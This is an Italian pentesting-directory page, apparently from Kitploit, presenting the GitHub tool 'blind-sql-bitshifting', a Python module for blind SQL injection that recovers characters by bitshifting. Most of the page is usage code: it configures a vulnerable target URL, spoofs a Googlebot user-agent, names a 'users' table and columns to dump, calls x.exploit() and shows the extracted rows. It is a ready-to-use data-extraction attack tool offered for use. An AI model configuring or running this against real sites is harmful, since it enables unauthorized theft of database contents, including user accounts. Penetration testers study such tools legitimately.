Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
blind-sql-bitshifting — Un modulo di SQL injection blind che utilizza il bitshfting per calcolare i caratteri. | Kitploit
Strumenti/GitHubGitHub/awnumar/blind-sql-bitshifting
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingArchived
GitHubawnumar/blind-sql-bitshifting

blind-sql-bitshifting

Un modulo di SQL injection blind che utilizza il bitshfting per calcolare i caratteri.

Vedi Repository
133494 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Blind SQL Injection tramite bitshifting

Questo è un modulo che esegue blind SQL injection utilizzando il metodo del bitshifting per calcolare i caratteri invece di indovinarli. Richiede 7/8 richieste per carattere, a seconda della configurazione.

Utilizzo

root@kitploit:~
import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

Configurazione di esempio:

root@kitploit:~
# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1

L'opzione assume_only_ascii fa sì che il modulo assuma che i caratteri estratti siano tutti ASCII. Poiché il set di caratteri ASCII arriva solo fino a 127, possiamo impostare il primo bit a 0 e non preoccuparci di calcolarlo. Si tratta di una riduzione del 12.5% delle richieste. Testando localmente, questo ha prodotto un aumento medio della velocità del 15%. Ovviamente ciò può causare problemi durante l'estrazione di caratteri al di fuori del range ASCII. Per impostazione predefinita è impostato su 0.

Una volta configurato:

root@kitploit:~
data = x.exploit()

Restituisce un array bidimensionale, con ogni sotto-array contenente una singola riga, la prima delle quali sono le intestazioni delle colonne.

Esempio di output:

[['id', 'username'], ['1', 'user1'], ['2', 'user2'], ['3', 'user3'], ['4', 'user4']]

Opzionalmente, i tuoi script possono poi sfruttare il modulo tabulate per visualizzare i dati:

root@kitploit:~
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # This specifies to use the first row as the column headers.
               tablefmt='psql')     # Using the SQL output format. Other formats can be used.

Questo produrrebbe:

root@kitploit:~
+------+------------+
|   id | username   |
|------+------------|
|    1 | user1      |
|    2 | user2      |
|    3 | user3      |
|    4 | user4      |
+------+------------+
Scarica lo strumento